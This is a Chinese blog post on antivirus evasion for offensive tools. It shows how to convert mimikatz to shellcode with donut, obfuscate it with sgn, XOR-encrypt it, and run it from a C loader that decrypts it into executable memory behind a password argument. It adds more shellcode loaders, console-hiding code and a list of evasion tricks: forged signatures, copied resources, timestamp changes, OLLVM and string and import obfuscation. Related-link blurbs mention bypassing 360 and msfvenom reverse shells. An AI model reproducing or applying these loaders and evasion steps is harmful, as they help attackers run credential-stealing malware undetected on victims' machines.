实用的的免杀小技巧

最新推荐文章于 2024-06-04 17:25:35 发布
最新推荐文章于 2024-06-04 17:25:35 发布
阅读量698 收藏 11
点赞数 5
分类专栏: # 渗透测试 文章标签: c语言 网络安全 系统安全 windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_63701832/article/details/135902690
版权

文章目录

前记

针对mimikatz类c语言编写的工具,可以转化为shellcode的免杀并编写packer以降本增效

降本增效式免杀

先对mimikatz进行shellcode化

donut.exe -i mimikatz.exe -a 2 -e 2

shellcode过静态

sgn.exe -i loader.bin -a 64 -c 6 -M 1 -o cc.bin

然后对sgn混淆的文件进行异或加密

#include <stdio.h>
#include <Windows.h>
#include <stdlib.h>
#include<string.h>

int main() {
    //write
    FILE* file2 = NULL;
    char path2[] = "c1.bin";
    //read
    fopen_s(&file2, path2, "wb");
    FILE* file = NULL;
    char path[] = "cc.bin";
    fopen_s(&file, path, "rb");
    fseek(file, 0, SEEK_END);
    int filelen = ftell(file);
    fseek(file, 0, SEEK_SET);
    char* buf = (char*)VirtualAlloc(NULL, filelen, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    fread(buf, 1, filelen, file);
    //jiami
    int a = 88;    unsigned char jiami;
    unsigned char tmp;
    int b = 0;
    srand(a);
    for (int i = 0; i < filelen; i++) {
        b = rand() % 9 + 1;//1-9
        jiami = b ^ buf[i];
        fwrite(&jiami, sizeof(unsigned char), 1, file2);
    }
    fclose(file);
    fclose(file2);
    system("pause");
    return 0;
}

在这里插入图片描述

loader加载

这里放一个简单的内存中解密加载

#include <stdio.h>
#include <Windows.h>
#include<string.h>
void jisuan(int i) {
    for (int j = 0; j < i; j++)
        printf("%d\n", j);
}
int main(int argc, char* argv[])
{
    if (argc == 2)
    {
        char k[] = "998";
        if (strcmp(argv[1], k) == 0) {
            int a = 88;//key
            FILE* file = NULL;
            char path[] = "c1.bin";
            fopen_s(&file, path, "rb");
            fseek(file, 0, SEEK_END);
            int filelen = ftell(file);
            fseek(file, 0, SEEK_SET);
            char* buf = (char*)VirtualAlloc(NULL, filelen, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
            fread(buf, 1, filelen, file);
            int b;
            srand(a);
            for (int i = 0; i < filelen; i++)
            {
                b = rand() % 9 + 1;//1-9
                buf[i] = buf[i] ^ b;
            }
            void* p;
            ((void(*)())buf)();
        }
        else {
            jisuan(88);
        }
    }
    else
    {
        jisuan(100);
    }
    return 0;
}

签名

sigthief.py伪造

signtool不受信任

减熵

Junkcode添加垃圾量

更换编码方式(uuid,mac,ipv4,ipv6)

添加资源文件

文件伪装

resource hacker,直接导出正常文件的RES,导入到loader中

rcedit

修改创建、写入日期(newfiletime)

混淆源代码

ollvm(Instructions Substitution(指令替换)、Bogus Control Flow(混淆控制流)、Control Flow Flattening(控制流平展)

实际用处不大,但是可以很好的增加杀软云端逆向分析人员的工作量,加长免杀时间

导入隐藏

动态获取调用api

导入lazy_importer库

字符串隐藏

字符串数组分割赋值

导入现成的字符串混淆库

效果测试

在这里插入图片描述

后记

Hide Dos windows

预处理

#include<windows.h>
#pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"" ) // 设置入口地址
int main()
{
	MessageBoxA(NULL, "Hello", "Notice", NULL);
	return 0;
}

API实现

#include<windows.h>
void HideWindow() {
	HWND hwnd = GetForegroundWindow();
	if (hwnd) {
		ShowWindow(hwnd, SW_HIDE);
	}
}

int main()
{
	HideWindow();
	int a = 10;
	return 0;
}

#include<windows.h>
int main()
{
	FreeConsole();
	int a = 10;
	return 0;
}

常规读文件loader

#include <stdio.h>
#include <Windows.h>
#include <stdlib.h>
#include<string.h>

int main(int argc, char* argv[])
{
            FILE* file = NULL;
            char path[] = "loader.bin";
            fopen_s(&file, path, "rb");
            fseek(file, 0, SEEK_END);
            int filelen = ftell(file);
            fseek(file, 0, SEEK_SET);
            char* buf = (char*)VirtualAlloc(NULL, filelen, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
            fread(buf, 1, filelen, file);
            void* p;
            ((void(*)())buf)();
    return 0;
}

或者

#include<stdio.h>
#include<windows.h>
#pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"" )
int main()
{
    HANDLE bin = CreateFileA("loader.bin", GENERIC_READ, NULL, NULL, OPEN_EXISTING, NULL, NULL);
    DWORD64 bin_size = GetFileSize(bin, NULL);
    LPVOID bin_bytes = VirtualAlloc(NULL, bin_size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    DWORD out_size = 0;
    ReadFile(bin, bin_bytes, bin_size, &out_size, NULL);
    DWORD tmp;
    VirtualProtect(bin_bytes, sizeof(bin_bytes), PAGE_EXECUTE_READWRITE, &tmp);
    ((void(*)())bin_bytes)();
    CloseHandle(bin);
    return 0;
}
coleak
关注
  • 5
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
30.远控专题(30)-Python加载shellcode-8种方式(VT率10-69)1
08-03
总的来说,Python加载shellcode是一种实用技巧,结合不同的编码、加密和混淆技术,可以有效降低被反病毒软件检测到的风险。然而,随着毒软件技术的发展,技术也需要不断更新和优化,以应对新的挑战。...
Bypass 360核晶的shellcode Packer
Fly_鹏程万里
05-24 446
unhook使用了自定义跳转函数的unhook方法文中所讲述的方法,文中提到的github仓库 trickster0/LdrLoadDll-Unhooking 只实现了64位下的demo,我在 LdrLoadDll-Unhooking-x86-x64 中完善了32位和64位通用的一段代码。支持aes/xor加密,uuid/words混淆,支持间接syscall和unhook两种模式下的callback,fiber,earlybird三种加载方式。360(未开核晶):无检出。
记一次有点抽象的渗透经历
蚁景网安学院
05-17 802
在各种信息搜集中,发现某个ip的端口挂着一个比较老的服务。首先看到了员工工号和手机号的双重验证,也不知道账号是什么结构组成的,基本上放弃字典爆破这一条路。于是乎打开之前用灯塔的扫描结果,看看文件泄露是否有什么可用的点。
默安逐日实验室:研究
最新发布
moresec的博客
06-04 1144
(Bypass AV, Anti-Virus Evasion)是指恶意软件通过各种手段规避毒软件和安全检测系统的识别和拦截,从而在目标系统中成功执行。这种技术不仅用于恶意软件的传播,也被信息安全研究人员用来测试和提升安全防护系统的能力。根据有无源码,可以分为以下两种情况:​ 一般直接对二进制可执行文件进行无源码技术难度较高,效果也不好。于是可以通过将编译好的二进制可执行文件转化为一段shellcode,然后编写加载器执行这段shellcode,从而实现无源码向有源码的转化。根据
【安全研究】对抗之源码
weixin_46591320的博客
05-16 2608
0x01 分类 渗透测试中常需要马,这块的内容交叉且形式多样。常见的方式,源码混淆、DLL文件替换、文件修改、加壳、花指令、签名等。的内容比较偏向破解、反编译范畴的安全研究,也是武器库中的必不可少的部分。本文章是系列教程,各种方式都会涉及,本次分享的是源码。 0x02 源码 这里以Python做为例,其他语言如C#、GO、Ruby等思路相同。 的大致步骤可以分为如下,视情况可以采用部分步骤: 加载器选择-ctypes-DLL&其他,加载shellcode
【渗透实战】木马
zkaqlaoniao的博客
11-14 1506
base64 sgn编码。
基础之给病毒加上可信资源过360
从事厨房信息化行业,万能对接所有点餐系统,kds,智能控菜,酒店协调软件
09-19 530
donut.exe -i calc.exe -a 2(x64是2,x86是1) 把exe转换成.bin(测试时将calc.exe替换成木马)sgn.exe -a 64(64位系统) -c 5(等待时间为5) shellcode.bin。使用Resource Hacker将任意一个360的资源保存下来。new.exe即是混淆后的二进制文件。将保存下来的资源导入到病毒中。
教你怎样源码
热门推荐
liujiayu2的专栏
09-14 1万+
源码也离不开手动定位特征码,但是修改比较容易,灵活性也比较大,接下来就听危险漫步给各位慢慢的来分享分析。 一、如何查找特征码 查找特征码与代码的对应位置,是这篇文章首先需要了解的基础。为了方便我们查找,在编译的时候生成map文件,选择vc工程选项(project),在下拉菜单中选择设置(settings),或者你也可以按快捷键alt+f7;弹出工程设置对话框(project set
对抗-java语言-shellcode-源码修改+打包exe
xiaoheizi的博客
09-21 1047
命令:msfvenom -p java/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xxxx -f jar -o msf.jar。1.点击启动jd-gui,将生成的msf.jar拖入其中进行反编译,点击file—save all sources导出反编译后的内容。1.将exe4j打包的exe程序再使用inno工具和jdk环境打包合并到一起,将文件上传目标系统,成功绕过检测。命令:jar cvfm 名称.jar META-INF/MANIFEST.MF .
apk修改器.rar
01-27
这款工具对于开发者或者对手机系统有深入研究的用户来说非常实用。 在Android应用开发中,APK文件是编译打包后的结果,它包含了应用的所有代码、资源和配置信息。通过使用APK修改器,我们可以无需源代码就能直接...
UPXShell 加壳工具 V3.4.2.2010 绿色汉化版
11-24
UPXShell是一款强大的加壳工具,它基于知名的UPX(Ultimate Packer for eXecutables)程序...总之,UPXShell是一款实用的加壳工具,适用于开发者和普通用户对EXE文件进行压缩和保护,但使用时应注意潜在的风险和限制。
源码【内置解说、视频mp4】
10-12
资源分享者,资源爱好者,我是浪杉,点我资料关注,每日不定时分享全网优质源码!源码【内置解说、视频mp4】,低价出售,关照朋友们
源码工具
12-14
自己写的一个源码工具 简单实用 源码 远控源码工具
源码-花指令
08-21
含源码,研究使用,大家在不读懂的情况下不要运行。{我们交流的是技术,展示的源代码和相关代码的目的只是为了说明技术的原理和使用。如果任何个人或组织利用本文档发布的技术进行破坏,应由其本人负责。
树杆为什么涂上白色的油漆作文.doc
01-26
这不仅是一种实用的园艺技巧,也是自然科学在日常生活中的应用。了解这样的知识,有助于我们更好地理解自然界的运作规律,培养观察和探索的习惯,从而丰富我们的知识,拓宽视野。 总的来说,涂石灰是保护树木的重要...
vc++ 应用源码包_6
09-15
Visual.C++编程技巧精选500例源代码 内含各种例子(vc下各种控件的使用方法、标题栏与菜单栏、工具栏与状态栏、图标与光标、程序窗口、程序控制、进程与线程、字符串、文件读写操作、文件与文件夹属性操作、文件与...
Mimikatz源码
LainWith的博客
01-04 4861
目录介绍环境准备处理报错生成32位生成64位下载360、360毒直接查关键字替换-失败去除注释,修改版本信息删除注释信息替换图标修改版本信息重新编译文件过软360家族腾讯电脑管家火绒在线查参考 学习一下月师傅的文章 介绍 Mimikatz是一款能够从Windows认证(LSASS)的进程中获取内存,并且获取明文密码和NTLM哈希值的工具,攻击者可以借此漫游内网。也可以通过明文密码或者传递hash值来提权。因为这款工具特别出名所以被查的机率很大,我们可以通过github上的开源代码对其进行源码
攻防技术——源码实战
m0_60571990的博客
11-08 337
攻防技术——源码实战
python sgn
01-06
SGN是一种用于视频动作识别的深度学习模型。根据引用,你可以使用Python 3.6和PyTorch 1.0环境来训练SGN模型。训练脚本可以通过以下命令运行: ```shell cd SGN python train.py ``` 请注意,你需要修改数据集路径以适应你自己的数据。这个SGN模型的训练策略与论文中描述的相同。 另外,根据引用,正则化方法是一种用来控制模型复杂度并防止过拟合的技术。常用的正则化方法包括L1范数和L2范数正则化方法。L_p范数是一种衡量向量大小的方法,对于n维向量x={x^(1),x^(2),…,x^(n)},其L_p范数定义为: <<引用:L_p范数公式>> 如果你想了解更多关于SGN模型的细节或者如何使用正则化方法,请提出具体的问题。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

coleak

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值